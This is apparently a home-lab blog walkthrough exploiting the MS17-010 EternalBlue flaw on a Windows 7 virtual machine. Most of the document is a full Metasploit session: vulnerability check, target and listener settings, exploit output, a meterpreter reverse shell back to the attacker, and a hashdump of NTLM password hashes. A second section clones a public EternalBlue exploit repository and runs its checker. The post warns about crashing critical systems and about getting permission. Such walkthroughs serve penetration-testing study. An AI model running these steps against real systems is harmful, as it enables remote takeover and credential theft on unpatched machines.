|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

Nmap done: 1 IP address (1 host up) scanned in 110.60 seconds
┌──(kali㉿kali)-[~] └─$ msfconsole
msf6 > search eternalblue
Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption

msf6 >use 0 
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 10.0.2.7
rhost => 10.0.2.7                                                    
msf6 exploit(windows/smb/ms17_010_eternalblue) > check                                                                       
[*] 10.0.2.7:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check 
[+] 10.0.2.7:445          - Host is likely VULNERABLE to MS17-010! - W
[*] 10.0.2.7:445          - Scanned 1 of 1 hosts (100% complete)     
[+] 10.0.2.7:445 - The target is vulnerable.

meterpreter/reverse_tcp
meterpreter/reverse_tcp

msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost eth0
lhost => 10.0.2.15                                                                                                 
msf6 exploit(windows/smb/ms17_010_eternalblue) > run                                                               
                                                                                                                   
[*] Started reverse TCP handler on 10.0.2.15:4444                                                                  
[*] 10.0.2.7:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check                                               
[+] 10.0.2.7:445          - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)                                                                                                              
[*] 10.0.2.7:445          - Scanned 1 of 1 hosts (100% complete)                                                   
[+] 10.0.2.7:445 - The target is vulnerable.                                                                       
[*] 10.0.2.7:445 - Connecting to target for exploitation.                                                          
[+] 10.0.2.7:445 - Connection established for exploitation.                                                        
[+] 10.0.2.7:445 - Target OS selected valid for OS indicated by SMB reply                                          
[*] 10.0.2.7:445 - CORE raw buffer dump (38 bytes)                                                                 
[*] 10.0.2.7:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima                   
[*] 10.0.2.7:445 - 0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service                    
[*] 10.0.2.7:445 - 0x00000020  50 61 63 6b 20 31                                Pack 1                             
[+] 10.0.2.7:445 - Target arch selected valid for arch indicated by DCE/RPC reply                                  
[*] 10.0.2.7:445 - Trying exploit with 12 Groom Allocations.                                                       
[*] 10.0.2.7:445 - Sending all but last fragment of exploit packet                                                 
[*] 10.0.2.7:445 - Starting non-paged pool grooming                                                                
[+] 10.0.2.7:445 - Sending SMBv2 buffers                                                                           
[+] 10.0.2.7:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.                           
[*] 10.0.2.7:445 - Sending final SMBv2 buffers.                                                                    
[*] 10.0.2.7:445 - Sending last fragment of exploit packet!                                                        
[*] 10.0.2.7:445 - Receiving response from exploit packet                                                          
[+] 10.0.2.7:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!                                      
[*] 10.0.2.7:445 - Sending egg to corrupted connection.
[*] 10.0.2.7:445 - Triggering free of corrupted buffer.
[*] Sending stage (200774 bytes) to 10.0.2.7
[*] Meterpreter session 1 opened (10.0.2.15:4444 -> 10.0.2.7:49159) at 2023-03-23 10:10:34 -0400
[+] 10.0.2.7:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.0.2.7:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.0.2.7:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter > hashdump Administrator:500:aad3b435b51404eeaad3b435b51404ee:58f5081696f366cdc72491a2c4996bd5::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:f580a1940b1f6759fbdd9f5c482ccdbb::: user:1000:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe::: meterpreter >

How to do the same in manual method

Google Search for - eternal blue github
(kali㉿kali)-[/opt]
└─$ sudo git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
┌──(kali㉿kali)-[/opt] └─$ cd AutoBlue-MS17-010
┌──(kali㉿kali)-[/opt/AutoBlue-MS17-010] └─$ pip install -r requirements.txt
┌──(kali㉿kali)-[/opt/AutoBlue-MS17-010] └─$ python eternal_checker.py 10.0.2.7 [*] Target OS: Windows 7 Ultimate 7601 Service Pack 1 [!] The target is not patched === Testing named pipes === [*] Done

These exploits might take the machine down, if the systems are critical like in public sector- hospitals/ other civil service, just take the screen shots and get permission to do the exploits
┌──(kali㉿kali)-[/opt/AutoBlue-MS17-010]
└─$ cd shellcode  

shell_prep-sh
shell_prep-sh

Setting payload

Setting payload 01
Setting payload 01

Setting payload 02
Setting payload 02
Setting Listener

Setting Listener
Setting Listener
Running exploit

Running exploit
Running exploit

Vuln machine crashed

Vuln machine crashed

THe above example explains:-
These exploits might take the machine down, if the systems are critical like in public sector- hospitals/ other civil service, just take the screen shots and get permission to do the exploits .

************************************************************************************








Comments

Popular Posts

Chennai :MTC complaint cell Customer Care No.:+91-9445030516 /Toll Free : 18005991500

Marriage Registration Online steps [Tamil Nadu]

HOME LAB